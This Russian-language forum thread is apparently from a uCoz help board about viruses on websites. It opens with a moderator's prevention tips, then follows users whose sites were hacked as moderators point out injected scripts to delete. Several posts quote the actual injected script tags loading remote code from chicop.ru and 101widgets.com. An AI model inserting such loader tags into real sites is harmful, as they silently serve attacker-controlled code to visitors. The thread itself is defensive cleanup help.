|
Вирусы на сайтах
|
|
Сообщение # 1 |
22:08:04
21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт - Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.
- Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.
- В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса
- Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.
- Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.
Диагностика - Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров - Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
- Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте - Вы должны предоставить ссылку на сайт!
- Вы должны дать описание проблемы:
1) на какой странице сайта обнаруживается проблема (ссылка)
2) проблема обнаруживается только под логином или под гостем тоже
3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки
4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
Сообщение от Модератор форума
|
Evita2688
Сообщений: 4
Сообщение # 1201 |
13:28:54
27 Мар 2014
Здравствуйте, подскажите пожалуйста. При добавлении материалов на сайте http://logopeddoma.ru/ Доктор Веб пишет что обнаружена угроза, выглядит так
"Object","Threat","Action","Path",""
"0.htm?ad=165746&pl=93829&rnd=751096483","SCRIPT.Virus","Заблокирован","http://awaps.yandex.ru/0/2153/0.htm?ad=165746&pl=93829&rnd=751096483"
Что это может быть? Сама не разберусь, помогите, пожалуйста.
|
webanet
Сообщений: 24067
Сообщение # 1202 |
15:45:58
27 Мар 2014
Evita2688, это ложное срабатывание на рекламу яндекса
Цитата Вы как клиент DR.Web можете обратится в их поддержку за разъяснением
Бесплатный номер техподдержки в России: 8-800-333-7932
Для звонок в не из РФ +7 (495) 789-45-86 (техподдержка)
или лучше всего просто сообщите о фолсе по форме https://vms.drweb.com/sendvirus/
выберите ссылку (дайте ссылку на свой сайт, где происходит блокировка)
выберите пункт ложное срабатывание
введите обязательно мейл свой на который получите ответ
в комментарии напишите это
Цитата ложное срабатывание вердикт
"Object","Threat","Action","Path",""
"0.htm?ad=165746&pl=93829&rnd=751096483","SCRIPT.Virus","Заблокирован","http://awaps.yandex.ru/0/2153/0.htm?ad=165746&pl=93829&rnd=751096483"
|
Evita2688
Сообщений: 4
Сообщение # 1203 |
16:12:52
27 Мар 2014
Цитата Evita2688, это ложное срабатывание на рекламу яндекса
Спасибо Вам большое! Успокоили 
|
Alekso
Сообщений: 12
Сообщение # 1204 |
22:07:44
29 Мар 2014
У меня опять на сайте беда http://drozd-cruiser.ucoz.ru/ Это уже 3-й взлом за эти 2 месяца. Знаю, что надо менять пароли в админку, но нет возможности. Связь с главным админом потеряна. Пробежал по основным скриптам. Не нашел.
Кому писать, чтобы помогли изменить пароли в админке? Пробовал сам, но там в кодовом слове животину спрашивают, а я ни снои ни духом, кто у админа был любимый зверь! 
Сообщение отредактировал Alekso - Суббота, 29 Мар 2014, 22:17:11
|
$Vladimir$
Сообщений: 7465
Сообщение # 1205 |
22:27:36
29 Мар 2014
Alekso, вредоносный код удален
был
Код <script language='javascript' charset='UTF-8' type='text/javascript' src='http://chicop.ru/8v0n2hh3ndr8ecvzhy9kwkzw9fgidzp'></script>
|
Alekso
Сообщений: 12
Сообщение # 1206 |
23:42:31
29 Мар 2014
Я уже увидел. Спасибо. Был еще внизу шаблона. Код <script language='javascript' charset='UTF-8' type='text/javascript' src='http://chicop.ru/8v0n2hh3ndr8ecvzhy9kwkzw9fgidzp'></script></div>
---------------------------------------------
Сообщение отредактировал Alekso - Суббота, 29 Мар 2014, 23:43:25
|
Сидорович
Сообщений: 3
Сообщение # 1207 |
11:44:26
31 Мар 2014
Здравствуйте. У меня на странице (http://airgun-mg.ucoz.ru) после выходных появились банеры (при нажатии отпровляет на http://www.popunder.ru). Как от этого
избавится?
Еще появилось вот это 
Сообщение отредактировал Сидорович - Понедельник, 31 Мар 2014, 13:12:54
|
сondor
Сообщений: 4661
Сообщение # 1208 |
15:13:15
31 Мар 2014
Сидорович, удаляйте из шаблона нижней части сайта скрипт:
Код <script language='javascript' charset='UTF-8' type='text/javascript' src='http://chicop.ru/68sb0mshp9b78t1epj44r8zi8bjocb9'></script>
|
volk812
Сообщений: 6
Сообщение # 1209 |
22:25:04
31 Мар 2014
Доброго времени суток!
На сайте появилось сразу несколько банеров. Помогите, пожалуйста найти. Сам попробовал - не вышло.
|
Dukhovnik
Сообщений: 129
Сообщение # 1210 |
22:30:09
31 Мар 2014
deleted
Помогаю по сайтам в лс
Сообщение отредактировал Dukhovnik - Понедельник, 31 Мар 2014, 22:35:40
|
webanet
Сообщений: 24067
Сообщение # 1211 |
22:31:37
31 Мар 2014
Dukhovnik, если не понимаете о чем речь, то воздержитесь от советов. то что вы указали это рекламный баннер системы. а проблема совершенно в другом
volk812, ждите
|
$Vladimir$
Сообщений: 7465
Сообщение # 1212 |
22:49:52
31 Мар 2014
volk812, сайт очищен. Смените пароли доступа, uID профиля.
|
volk812
Сообщений: 6
Сообщение # 1213 |
22:52:03
31 Мар 2014
Всем спасибо за помощь! Кажется, пока больше нет ничего лишнего.
Сообщение отредактировал volk812 - Понедельник, 31 Мар 2014, 22:52:38
|
DashaLove
Сообщений: 4
Сообщение # 1214 |
23:52:37
31 Мар 2014
При заходе на сайт, включается какая то украинская передача, как радио. Не всегда, но за последние три дня это уже второй случай. адрес сайта http://www.ekonomb.ru/
|
webanet
Сообщений: 24067
Сообщение # 1215 |
00:02:31
01 Апр 2014
DashaLove, из блока афоризмы удалите скрипт
Код <script language="JavaScript" src="http://101widgets.com/ffff0005/170/220"></script>
виджеты с этого сайта вообще не стоит устанавливать
и эту рекламу устанавливали вы?
Код <script type="text/javascript">
(function (w, d) {
var proto = d.location.protocol === "https:" ? "https:" : "http:";
w.feedAsyncInit = function() {
w.FeedAPI({
feedUrl: proto + '//getcoupons.ru/feed/5949d6e491e960bd119a/',
container: 'coupons-feed'
};).feed();
};
(function(d){
var js, id = 'feed-frame', ref = d.getElementsByTagName('script')[0];
if (d.getElementById(id)) {return;}
js = d.createElement('script'); js.id = id; js.async = true;
js.src = proto + '//getcoupons.ru/static/feeds/js/admitad.feeds.js?3342c3e1';
ref.parentNode.insertBefore(js, ref);
}(d));
}(window, window.document));
</script>
удалите и её и понаблюдайте за сайтом
и если можно подробности. что такое появляется передача типа радио
|
Чат сообщества
